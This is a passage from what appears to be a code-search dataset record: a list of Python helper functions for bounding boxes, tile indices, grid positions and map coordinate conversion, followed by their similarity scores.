2)\n\n return (top, bottom, left, right)", "def get_bounds(self):\n bottom_right = np.asarray([self.coords[k][0] for k in range(self.dim)])\n upper_left = np.asarray([self.coords[k][-1] for k in range(self.dim)])\n return bottom_right, upper_left", "def lower_right(self) -> Tuple[decimal.Decimal, decimal.Decimal]:\n return self.right, self.bottom", "def internal_bounds(self) -> tuple[float, float, float, float]:\n xres, yres = self.res\n w, s, e, n = self.bounds\n y0, y1 = (n, s) if yres < 0 else (s, n)\n x0, x1 = (e, w) if xres < 0 else (w, e)\n return x0, y0, x1, y1", "def sw_corner(self):\n return (self.min_lat, self.min_lon)", "def lower_left(self) -> Tuple[decimal.Decimal, decimal.Decimal]:\n return self.left, self.bottom", "def get_bounds(self):\n occupied_locations = self.board.keys()\n min_x = min(p[0] for p in occupied_locations)\n max_x = max(p[0] for p in occupied_locations)\n min_y = min(p[1] for p in occupied_locations)\n max_y = max(p[1] for p in occupied_locations)\n return ((min_x, max_x), (min_y, max_y))", "def upleft(self):\n return Coord([self.x - 1, self.y - 1])", "def get_tile(left, up, right, down):\n tile = 0\n if left:\n tile += 1\n if up:\n tile += 2\n if right:\n tile += 4\n if down:\n tile += 8\n return tile", "def extent(self):\n if self.x is not None:\n if self.y is not None:\n if self.z is not None:\n return (self.x.min(), self.x.max(),\n self.y.min(), self.y.max(),\n self.z.min(), self.z.max())\n return (self.x.min(), self.x.max(),\n self.y.min(), self.y.max())\n return (self.x.min(), self.x.max())\n\n elif self.r is not None and self.t is not None:\n if self.z is not None:\n return (self.z.min(), self.z.max(),\n self.r.min(), self.r.max(),\n self.t.min(), self.t.max())\n return (self.r.min(), self.r.max(),\n self.t.min(), self.t.max())\n\n return ()", "def calculate_min_max_tiles(self):", "def getlefttop(self,xnum,ynum):\n left = self.xmargin + xnum*CELLSIZE\n top = self.ymargin + ynum*CELLSIZE\n return (left,top)", "def convertLatLongToPixels(mapImg, leftLongitude, rightLongitude, topLatitude, bottomLatitude, latLong):\n latitude = min(max(latLong[0], bottomLatitude), topLatitude)\n longitude = min(max(latLong[1], leftLongitude), rightLongitude)\n\n diffLat = topLatitude - bottomLatitude\n diffLong = rightLongitude - leftLongitude\n\n pixelX = (longitude - leftLongitude)/diffLong*mapImg.size[0]\n pixelX = max(min(pixelX, mapImg.size[0] - 1), 0)\n pixelY = mapImg.size[1] - (latitude - bottomLatitude)/diffLat*mapImg.size[1]\n pixelY = max(min(pixelY, mapImg.size[1] - 1), 0)\n return (pixelX, pixelY)", "def get_bounds(self):\r\n left, bottom, front = 10000, 10000, 10000\r\n right, top, back = -10000, -10000, -10000\r\n for b in self.buf:\r\n for v in b.vertices:\r\n if v[0] < left:\r\n left = v[0]\r\n if v[0] > right:\r\n right = v[0]\r\n if v[1] < bottom:\r\n bottom = v[1]\r\n if v[1] > top:\r\n top = v[1]\r\n if v[2] < front:\r\n front = v[2]\r\n if v[2] > back:\r\n back = v[2]\r\n\r\n return (left, bottom, front, right, top, back)", "def bottomLeftCorner(self):\n self._updateExtents()\n return (self._mMinX,self._mMaxY)", "def get_bounds(self):\n\n northing=self.f.variables['y']\n easting=self.f.variables['x']\n\n lat1,lon1 = utm.to_latlon(np.min(easting),np.min(northing),11,northern=True)\n lat2,lon2 = utm.to_latlon(np.max(easting),np.max(northing),11,northern=True)\n\n return (lon1,lon2,lat1,lat2)", "def create_coords(self, xleft, ytop):\n xbox_left = np.int(xleft*self.scale)\n ytop_draw = np.int(ytop*self.scale)\n win_draw = np.int(self.window*self.scale)\n ystart = self.ys[0]\n\n startx, starty = xbox_left, np.int(ytop_draw+ystart)\n endx, endy = np.int(xbox_left+win_draw), np.int(ytop_draw+win_draw+ystart)\n bbox_coord = ((startx, starty), (endx, endy))\n #bbox_coords.append(((startx, starty), (endx, endy)))\n\n startx, starty = ytop_draw+ystart, ytop_draw+win_draw+ystart\n endx, endy = xbox_left, xbox_left+win_draw\n heatmap_coord = ((startx, starty), (endx, endy))\n #heatmap_coords.append(((startx, starty), (endx, endy)))\n return bbox_coord, heatmap_coord", "def _get_tiles_and_coords(\n self, tensor: torch.Tensor\n ) -> Tuple[torch.Tensor, List[List[int]], List[List[List[int]]]]:\n assert tensor.dim() == 4 and tensor.shape[0] == 1\n\n y_coords, y_overlaps = self._calc_tile_coords(\n tensor.shape[2], self._tile_size[0], self._tile_overlap[0]\n )\n x_coords, x_overlaps = self._calc_tile_coords(\n tensor.shape[3], self._tile_size[1], self._tile_overlap[1]\n )\n tile_coords = torch.jit.annotate(List[Tuple[int, int, int, int]], [])\n [\n [\n tile_coords.append(\n (y, y + self._tile_size[0], x, x + self._tile_size[1])\n )\n for x in x_coords\n ]\n for y in y_coords\n ]\n tiles = torch.cat([tensor[..., c[0] : c[1], c[2] : c[3]] for c in tile_coords])\n return tiles, [y_coords, x_coords], [y_overlaps, x_overlaps]", "def midtop(self):\n return (self.centerx, self.top)", "def world_to_grid(mapdata, wp):\n WX = wp.x\n WY = wp.y\n resol = mapdata.info.resolution\n # -0.5 but coordinates to center\n gx = math.floor((WX - mapdata.info.origin.position.x) / resol - 0.5)\n gy = math.floor((WY - mapdata.info.origin.position.y) / resol - 0.5)\n return gx, gy", "def get_grid_position(self, as_int=True):\n if as_int:\n return (\n int(self.x // Constant.TILE_SIZE),\n int(self.y // Constant.TILE_SIZE),\n )\n else:\n return (\n self.x / Constant.TILE_SIZE,\n self.y / Constant.TILE_SIZE,\n )", "def get_grid_position(self):\n tile_size_x = constants.WINDOW_WIDTH / constants.GRID_TILE_LENGTH\n tile_size_y = constants.WINDOW_HEIGHT / constants.GRID_TILE_LENGTH\n grid_x = tile_size_x / self.host.x\n grid_y = tile_size_y / self.host.y\n return grid_x, grid_y", "def get_coords(self):\n xTK = int(jeu.coords(self.rectangle)[0]) # Coordonnées TKinter x1 et y1 du rectangle correspondant à la voiture\n yTK = int(jeu.coords(self.rectangle)[1])\n # On divise par la largeur d'une case et on renvoie les valeurs obtenues sous la forme d'un tuple\n X = xTK//100\n Y = yTK//100\n resultat = [X, Y]\n return resultat", "def get_range(self) -> tuple[int, int]:\n return self.range_from, self.range_to", "def get_soft_bounds(self):\n if self.bounds is None:\n hl,hu=(None,None)\n else:\n hl,hu=self.bounds\n\n if self._softbounds is None:\n sl,su=(None,None)\n else:\n sl,su=self._softbounds\n\n \n if sl is None: l = hl\n else: l = sl\n\n if su is None: u = hu\n else: u = su\n\n return (l,u)", "def get_bounds(self):\n return ([self.t_min] * self.dim,[self.t_max] * self.dim)", "def relative_position(self) -> Tuple[int, int]:\n return self.position[0] - self.region.rect.x, self.position[1] - self.region.rect.y", "def relative_position(self) -> Tuple[int, int]:\n return self.position[0] - self.region.rect.x, self.position[1] - self.region.rect.y", "def top_left_tile_value(self):\n\t\treturn 1", "def bottom_left_tile_value(self):\n\t\treturn self.expected_cols * (self.expected_rows - 1) + 1", "def getRange(self) -> Tuple[int, int]:\n return self.validator().bottom(), self.validator().top()", "def get_position_coords(cls):\n row = math.floor(cls.position / cls.size)\n col = cls.position - row * cls.size\n return row, col", "def getPosition(self):\n\tleft = self.getLeft()\n\ttop = self.getTop()\n\treturn (left,top)", "def pupil_left_coords(self):\n if self.pupils_located:\n x = self.eye_left.origin[0] + self.eye_left.pupil.x + self.x_add\n y = self.eye_left.origin[1] + self.eye_left.pupil.y + self.y_add\n return (x, y)", "def tile_bbox(self, (z, x, y_tms)):\n topleft = (x * self.tileSize, (y_tms + 1) * self.tileSize)\n bottomright = ((x + 1) * self.tileSize, y_tms * self.tileSize)\n wn = self.unproject_pixels(topleft, z)\n es = self.unproject_pixels(bottomright, z)\n return wn + es", "def extent(self):\n left = self.transform[0]\n right = left + self.transform[1] * self.shape[1]\n top = self.transform[3]\n bottom = top + self.transform[5] * self.shape[0]\n return left, right, bottom, top", "def positive_left_right_requirements(\n self,\n ) -> Tuple[Tuple[GriddedPerm, ...], Tuple[GriddedPerm, ...]]:\n left, right = [], []\n for (x, y) in self._tiling.active_cells:\n if self._fuse_row and y == self._row_idx:\n left.append(GriddedPerm.single_cell((0,), (x, y)))\n right.append(GriddedPerm.single_cell((0,), (x, y + 1)))\n if not self._fuse_row and x == self._col_idx:\n left.append(GriddedPerm.single_cell((0,), (x, y)))\n right.append(GriddedPerm.single_cell((0,), (x + 1, y)))\n return tuple(sorted(left)), tuple(sorted(right))", "def get_tile_index_range(dataset_filename):\n dataset = gdal.Open(dataset_filename)\n assert dataset, 'Unable to open dataset %s' % dataset_filename\n spatial_reference = osr.SpatialReference()\n spatial_reference.ImportFromWkt(dataset.GetProjection())\n geotransform = dataset.GetGeoTransform()\n logger.debug('geotransform = %s', geotransform)\n# latlong_spatial_reference = spatial_reference.CloneGeogCS()\n tile_spatial_reference = osr.SpatialReference()\n s = re.match('EPSG:(\\d+)', tile_type_info['crs'])\n if s:\n epsg_code = int(s.group(1))\n logger.debug('epsg_code = %d', epsg_code)\n assert tile_spatial_reference.ImportFromEPSG(epsg_code) == 0, 'Invalid EPSG code for tile projection'\n else:\n assert tile_spatial_reference.ImportFromWkt(tile_type_info['crs']), 'Invalid WKT for tile projection'\n \n logger.debug('Tile WKT = %s', tile_spatial_reference.ExportToWkt())\n \n coord_transform_to_tile = osr.CoordinateTransformation(spatial_reference, tile_spatial_reference)\n # Upper Left\n xmin, ymax, _z = coord_transform_to_tile.TransformPoint(geotransform[0], geotransform[3], 0)\n # Lower Right\n xmax, ymin, _z = coord_transform_to_tile.TransformPoint(geotransform[0] + geotransform[1] * dataset.RasterXSize, \n geotransform[3] + geotransform[5] * dataset.RasterYSize, \n 0)\n \n logger.debug('Coordinates: xmin = %f, ymin = %f, xmax = %f, ymax = %f', xmin, ymin, xmax, ymax)\n\n return (int(floor((xmin - tile_type_info['x_origin']) / tile_type_info['x_size'])), \n int(floor((ymin - tile_type_info['y_origin']) / tile_type_info['y_size'])), \n int(ceil((xmax - tile_type_info['x_origin']) / tile_type_info['x_size'])), \n int(ceil((ymax - tile_type_info['y_origin']) / tile_type_info['y_size'])))", "def get_tile_coordinates_for_registration(self, grid_number, tile_number):\n dx, dy = self.get_tile_coordinates_d(grid_number, tile_number)\n width_d = self.get_tile_width_d(grid_number)\n height_d = self.get_tile_height_d(grid_number)\n return int((dx - width_d/2) * 1000), int((dy - height_d/2) * 1000)", "def LongitudinalBounds(lng, num_tiles):\n # Normalize to between -180 and 180 degrees longitude.\n while lng < -180.0:\n lng += 360.0\n while lng >= 180.0:\n lng -= 360.0\n\n degrees_per_tile = 360.0 / num_tiles\n x = int((lng + 180.0) / degrees_per_tile)\n west = x * degrees_per_tile - 180.0\n return (west, west + degrees_per_tile)", "def bbox(self):\n lower = (self.x.min(), self.y.min())\n upper = (self.x.max(), self.y.max())\n return (lower, upper)", "def coordinates(self) -> Tuple[float, float, float, float, float]:\n return (self.x, self.y, self.x + self.width, self.y + self.height)", "def getMachineCoordinates(self):\n return (self.x, self.y, self.z)", "def ne_corner(self):\n return (self.max_lat, self.max_lon)", "def image_coordinates(self, temp):\n iy = np.array((temp.y[:,None]-self.extent[2])/self.spacing[1],dtype=np.int64)\n ix = np.array((temp.x[None,:]-self.extent[0])/self.spacing[0],dtype=np.int64)\n return (iy,ix)", "def bounds(self):\n return self.min_col, self.min_row, self.max_col, self.max_row", "def top_left(self):\n return Point(self.left, self.top)", "def getStartTlXY(self, lat, lng,zoom):\n tile_size = 256\n # Use a left shift to get the power of 2\n # i.e. a zoom level of 2 will have 2^2 = 4 tiles\n numTiles = 1 << zoom\n # Find the x_point given the longitude\n point_x = (tile_size/ 2 + lng * tile_size / 360.0) * numTiles // tile_size\n # Convert the latitude to radians and take the sine\n sin_y = math.sin(lat * (math.pi / 180.0))\n # Calulate the y coorindate\n point_y = ((tile_size / 2) + 0.5 * math.log((1+sin_y)/(1-sin_y)) * -(tile_size / (2 * math.pi))) * numTiles // tile_size\n return int(point_x), int(point_y)", "def get_cell_coords(self, pt):\n\n\t return int(pt[0] // self.a), int(pt[1] // self.a)", "def get_boundingbox(self):\n tile_iterator = iter(self)\n (coordinate,tile) = next(tile_iterator)\n assert(tile is not None)\n min_x = coordinate[0]\n max_x = min_x + 1\n min_y = coordinate[1]\n max_y = min_y + 1\n\n for (coordinate,tile) in tile_iterator:\n\n if coordinate[0] < min_x:\n min_x = coordinate[0]\n if coordinate[0]+1> max_x:\n max_x = coordinate[0] +1\n if coordinate[1] < min_y:\n min_y = coordinate[1]\n if coordinate[1]+1> max_y:\n max_y = coordinate[1] +1\n\n return ((min_x, min_y), (max_x, max_y))", "def bounds(self) -> tuple[float, float, float, float]:\n transform = self.transform\n a, b, c, d, e, f, _, _, _ = transform\n if b == d == 0:\n xs = (c, c + a * self.width)\n ys = (f, f + e * self.height)\n else: # rotated\n c0x, c0y = c, f\n c1x, c1y = transform * (0, self.height)\n c2x, c2y = transform * (self.width, self.height)\n c3x, c3y = transform * (self.width, 0)\n xs = (c0x, c1x, c2x, c3x)\n ys = (c0y, c1y, c2y, c3y)\n return min(xs), min(ys), max(xs), max(ys)", "def get_bounds_halo(self):\n bottom_right = np.asarray([self.coords_halo[k][0] for k in range(self.dim)])\n upper_left = np.asarray([self.coords_halo[k][-1] for k in range(self.dim)])\n return bottom_right, upper_left", "def get_cell_coords(pt):\n\n return int(pt[0] // a), int(pt[1] // a)", "def _get_top_left_coordinates(height, width, patch_size):\n\n n_h = math.ceil(height / patch_size)\n n_w = math.ceil(width / patch_size)\n tops = np.linspace(0, height - patch_size, n_h, dtype=int)\n lefts = np.linspace(0, width - patch_size, n_w, dtype=int)\n\n return product(tops, lefts)", "def upright(self):\n return Coord([self.x + 1, self.y - 1])", "def gen_gps_to_coords(lat,lon,rows,cols,min_lat,max_lat,min_lon,max_lon):\n\n if (lat <= min_lat or lat >= max_lat or lon <= min_lon or lon >= max_lon):\n return (-1,-1)\n\n lat_step = abs(max_lat-min_lat)/rows\n lon_step = abs(max_lon-min_lon)/cols\n\n lat_spot = int((max_lat-lat)/lat_step)\n lon_spot = int((lon-min_lon)/lon_step)\n #print \"lat: %f lon: %f lat_spot: %f lon_spot: %f\" % (lat,lon,lat_spot,lon_spot)\n return (lat_spot,lon_spot)", "def roi_x_offset():\n def r(x):\n return x & 0xFFF\n\n def w(x):\n return min(x, 0xFFF)\n return r, w", "def find_yolo_coordinates(y_top, y_bottom, x_left, x_right, width, height):\n w = (width - x_left - x_right) / width # width of bounding box\n h = (height - y_top - y_bottom) / height # height of bounding box\n x = (1 - w / 2) - x_right / width # x center of box (distance right from UL)\n y = (1 - h / 2) - y_bottom / height # y center of box (distance down from UL)\n\n return x,y,w,h", "def get_grid_locations(self, top_left, other_pos):\n cell_x = torch.floor(((other_pos[:, 0] - top_left[:, 0]) / self.neighborhood_size) *self.grid_size)\n\n # Added this part to implementation, otherwise the pooling is going to run into an indexing error\n cell_x[cell_x == self.grid_size] -= 1\n cell_y = torch.floor(((top_left[:, 1] - other_pos[:, 1]) / self.neighborhood_size) *self.grid_size)\n cell_y[cell_y == self.grid_size] -= 1\n grid_pos = cell_x + cell_y * self.grid_size\n\n return grid_pos", "def extend (self) :\n return (self.x_min, self.x_max, self.y_min, self.y_max)", "def gettpoints(self,left,top,tnum):\n if tnum == 0:\n x1 = left + CELLSIZE/2\n y1 = top\n x2 = x1 + TSIZE\n y2 = y1 + TSIZE\n x3 = x2 - 2*TSIZE\n y3 = y2\n if tnum == 1:\n x1 = left + CELLSIZE\n y1 = top + CELLSIZE/2\n x2 = x1 - TSIZE\n y2 = y1 + TSIZE\n x3 = x2\n y3 = y2 - 2*TSIZE\n if tnum == 2:\n x1 = left + CELLSIZE/2\n y1 = top + CELLSIZE\n x2 = x1 - TSIZE\n y2 = y1 - TSIZE\n x3 = x2 + TSIZE*2\n y3 = y2\n if tnum == 3:\n x1 = left\n y1 = top + CELLSIZE/2\n x2 = x1 + TSIZE\n y2 = y1 + TSIZE\n x3 = x2\n y3 = y2 - TSIZE*2\n\n return ((x1,y1),(x2,y2),(x3,y3))", "def bottomleft(self):\n return (self.left, self.bottom)", "def pupil_right_coords(self):\n if self.pupils_located:\n x = self.eye_right.origin[0] + self.eye_right.pupil.x + self.x_add\n y = self.eye_right.origin[1] + self.eye_right.pupil.y + self.y_add\n return (x, y)", "def get_img_coord_tuple(img):\n\n lat = convert_to_degress(get_gps_details(img)['GPSLatitude'])\n if get_gps_details(img)['GPSLatitudeRef'] == 'S':\n lat = -lat\n\n longitude = convert_to_degress(get_gps_details(img)['GPSLongitude'])\n if get_gps_details(img)['GPSLongitudeRef'] == 'W':\n longitude = -longitude\n\n return lat, longitude", "def res(self) -> tuple[float, float]:\n xs, ys = self.xcoords.data, self.ycoords.data\n dx, dy = 0, 0\n if xs.ndim == 1:\n dx = xs[1] - xs[0]\n dy = ys[1] - ys[0]\n elif xs.ndim == 2:\n ddx0 = xs[1, 0] - xs[0, 0]\n ddy0 = ys[1, 0] - ys[0, 0]\n ddx1 = xs[0, 1] - xs[0, 0]\n ddy1 = ys[0, 1] - ys[0, 0]\n dx = math.hypot(ddx1, ddy1) # always positive!\n dy = math.hypot(ddx0, ddy0)\n rot = self.rotation\n acos = math.cos(math.radians(rot))\n # find grid top-down orientation\n if (\n (acos < 0 and ddy0 > 0)\n or (acos > 0 and ddy0 < 0)\n or (\n ddy0 == 0\n and (np.isclose(rot, 270) and ddx0 < 0)\n or (np.isclose(rot, 90) and ddx0 > 0)\n )\n ):\n dy = -1 * dy\n return dx, dy", "def chr_coords(s):\n return max_y - (max_y - min_y)*s", "def get_tile_coordinates_d(self, grid_number, tile_number):\n origin_dx, origin_dy = self.cs.get_grid_origin_d(grid_number)\n return (origin_dx + self.grid_map_d[grid_number][tile_number][0],\n origin_dy + self.grid_map_d[grid_number][tile_number][1])", "def fetchbounds(self):\n pnts = [x for x in [self.out_start, self.start, self.in_start, \\\n self.in_end, self.end, self.out_end] \\\n if x is not None]\n return min(pnts), max(pnts)", "def _get_range(self):\n return tuple((0, m, 1) for m in self.level_shapes[0])", "def top_right_tile_value(self):\n\t\treturn self.expected_cols", "def get_bottom_right(left, right):\n x = right.x - (right.x - left.x) / 8\n y = right.y - (right.y - left.y) / 8\n return (x, y)", "def getTilePos(self, pos = None):\n\n if not pos:\n pos = self.actor.getPos()\n \n for i in range(len(pos)):\n pos[i] = int(math.floor( (pos[i] + self.dimensions[i]) / 2.0))\n #pos[i] = int(math.floor( pos[i] / 2.0))\n\n return pos", "def normalized_position(self) -> Tuple[float, float]:\n x, y = self.relative_position\n return x / self.region.rect.width, y / self.region.rect.height", "def normalized_position(self) -> Tuple[float, float]:\n x, y = self.relative_position\n return x / self.region.rect.width, y / self.region.rect.height", "def test_mines_left_coordinates(self):\n pg.font.init()\n mines_coords = utils.mines_left_coords(1)\n self.assertIsInstance(mines_coords, tuple)", "def get_pos(x, y):\r\n return normalize(x) // 2, normalize(y) // 4", "def get_xrange_indices(self, lower, upper) -> Tuple[int, int]:\n lower_index = np.argmax(self.x >= lower)\n upper_index = np.argmax(self.x >= upper)\n return int(lower_index), int(upper_index)", "def _get_xy_lims(self):\n \n x = self.datapos[0] - 1\n y = self.datapos[1] - 1\n\n return x, y", "def get_uv_positions(data, image_size, target_grid, up_vector, right_vector, tile_xy, verts, vtx_center):\n\n return get_uv_pos_size(data, image_size, target_grid, tile_xy,\n target_grid.grid[0], target_grid.grid[1],\n up_vector, right_vector,\n verts, vtx_center)", "def coordinates(self) -> Tuple[int, int]:\n return self.x, self.y", "def region_points(x, y, width, xmin, xmax):\n right = (x, y + width / 2)\n top = (xmax, y)\n left = (x, y - width / 2)\n bottom = (xmin, y)\n return (right, top, left, bottom)", "def grid_coords(self):\n return [(x, y) for y in range(self.height) for x in range(self.width)]", "def extent(self):\n\n x = np.array([0, self.nx]) * self.dx + self.corner_grid.x0\n ypoint = [0, self.ny] if self.origin == 'lower-left' else [self.ny, 0]\n y = np.array(ypoint) * self.dy + self.corner_grid.y0\n\n return [x[0], x[1], y[0], y[1]]", "def left(self):\n return self.points['topLeft'].x", "def left(self):\n return self.points['topLeft'].x", "def bounds(self):\n return (\n self.x, self.y,\n self.x, self.y\n )", "def extents(self):\n x0, y0, width, height = self._rect_bbox\n xmin, xmax = sorted([x0, x0 + width])\n ymin, ymax = sorted([y0, y0 + height])\n return xmin, xmax, ymin, ymax", "def get_min_max(self):\n\n mr = np.sqrt(2 * np.log(1/self.mth)) * self.ms\n mr[:] = np.max(mr)\n\n mxmin = self.mx - mr\n mxmax = self.mx + mr\n mymin = self.my - mr\n mymax = self.my + mr\n mzmin = self.mz - mr\n mzmax = self.mz + mr\n\n mb_xmin_idx = np.argmin(mxmin[self.ma > 0])\n mb_xmax_idx = np.argmax(mxmax[self.ma > 0])\n mb_ymin_idx = np.argmin(mymin[self.ma > 0])\n mb_ymax_idx = np.argmax(mymax[self.ma > 0])\n mb_zmin_idx = np.argmin(mzmin[self.ma > 0])\n mb_zmax_idx = np.argmax(mzmax[self.ma > 0])\n\n xmin0 = self.mx[mb_xmin_idx] - mr[mb_xmin_idx]\n xmax0 = self.mx[mb_xmax_idx] + mr[mb_xmax_idx]\n ymin0 = self.my[mb_ymin_idx] - mr[mb_ymin_idx]\n ymax0 = self.my[mb_ymax_idx] + mr[mb_ymax_idx]\n zmin0 = self.mz[mb_zmin_idx] - mr[mb_zmin_idx]\n zmax0 = self.mz[mb_zmax_idx] + mr[mb_zmax_idx]\n\n xmin = xmin0 - (xmax0 - xmin0) * 0.25\n xmax = xmax0 + (xmax0 - xmin0) * 0.25\n ymin = ymin0 - (ymax0 - ymin0) * 0.25\n ymax = ymax0 + (ymax0 - ymin0) * 0.25\n zmin = zmin0 - (zmax0 - zmin0) * 0.25\n zmax = zmax0 + (zmax0 - zmin0) * 0.25\n\n return xmin, xmax, ymin, ymax, zmin, zmax", "def upper_right(self) -> Tuple[decimal.Decimal, decimal.Decimal]:\n return self.right, self.top", "def restored_position(self) -> Tuple[int, int]:\n x_n, y_n = self.normalized_position\n w, h = self.region.original_size\n return int(x_n * w), int(y_n * h)", "def restored_position(self) -> Tuple[int, int]:\n x_n, y_n = self.normalized_position\n w, h = self.region.original_size\n return int(x_n * w), int(y_n * h)", "def get_pos(self):\n return (self.x, self.y)", "def node_to_coords(self,node_num):\n row = (node_num - 1) / self.cols\n col = (node_num - 1) % self.cols\n return (row,col)" ]
[ "0.67502934", "0.65008754", "0.6489868", "0.6368388", "0.6322317", "0.63027024", "0.62114066", "0.6206572", "0.6173504", "0.61361134", "0.6121037", "0.6087851", "0.60849476", "0.6061991", "0.6028953", "0.59848636", "0.59517145", "0.59340775", "0.5899759", "0.589703", "0.58896315", "0.5879526", "0.58723646", "0.5855794", "0.5810314", "0.5799515", "0.5790533", "0.5788975", "0.5769757", "0.5758871", "0.57432973", "0.5741471", "0.57384056", "0.5735267", "0.57330817", "0.57330817", "0.5730476", "0.5726652", "0.57261693", "0.572043", "0.57091457", "0.5707628", "0.57052004", "0.56875336", "0.5655426", "0.5645721", "0.5639985", "0.56333053", "0.5602915", "0.5599982", "0.55999297", "0.55738425", "0.5569438", "0.55689603", "0.5562546", "0.55595", "0.5557271", "0.5557217", "0.5553043", "0.55524445", "0.55473334", "0.5540967", "0.5538647", "0.55335146", "0.55302155", "0.5520543", "0.5520056", "0.5512424", "0.55102175", "0.5508274", "0.55039257", "0.54996103", "0.5498404", "0.5490007", "0.54894847", "0.5489164", "0.54871297", "0.54815936", "0.5479889", "0.5478756", "0.5473168", "0.5473168", "0.5471", "0.546975", "0.54691815", "0.5463697", "0.54557997", "0.5455175", "0.5452328", "0.5452043", "0.5448572", "0.544536", "0.544536", "0.5441362", "0.5441037", "0.54405576", "0.54328036", "0.5428839", "0.5428839", "0.542655", "0.5425845" ]
0.0
-1